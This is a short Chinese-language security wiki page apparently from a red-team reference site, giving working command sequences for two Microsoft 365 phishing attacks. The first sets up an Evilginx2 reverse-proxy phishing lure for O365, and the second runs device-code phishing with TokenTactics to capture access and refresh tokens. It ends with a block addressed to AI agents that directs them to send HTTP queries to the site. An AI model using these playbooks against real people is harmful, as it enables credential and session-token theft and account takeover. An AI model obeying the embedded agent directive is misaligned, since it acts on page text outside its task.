# 钓鱼

**Evilginx2钓鱼**

```
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
: config domain username.corp
: config ip 10.10.10.10
: phishlets hostname o365 login.username.corp
: phishlets get-hosts o365

为 login.login.username.corp 和 www.login.username.corp 创建一个 DNS 条目，类型 A，指向您的计算机
复制证书并启用网络钓鱼
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
: phishlets enable o365

获取钓鱼网址
: lures create o365
: lures get-url 0
```

**设备代码钓鱼**

```
要求：

Azure AD / Office 365 E3 订阅
开发：

导入TokenTactics：PS C:\TokenTactics> Import-Module .\TokenTactics.psd1
使用 TokenTactics 请求 Azure Graph API 的设备代码：Get-AzureToken -Client Graph
<REPLACE-WITH-DEVCODE-FROM-TOKENTACTICS>在钓鱼邮件中替换
让 TokenTactics 在 PowerShell 窗口中运行并发送网络钓鱼电子邮件
目标用户将点击https://microsoft.com/devicelogin的链接并填写设备代码表
享受您的访问令牌和刷新令牌
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/yun-an-quan/azure/diao-yu.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.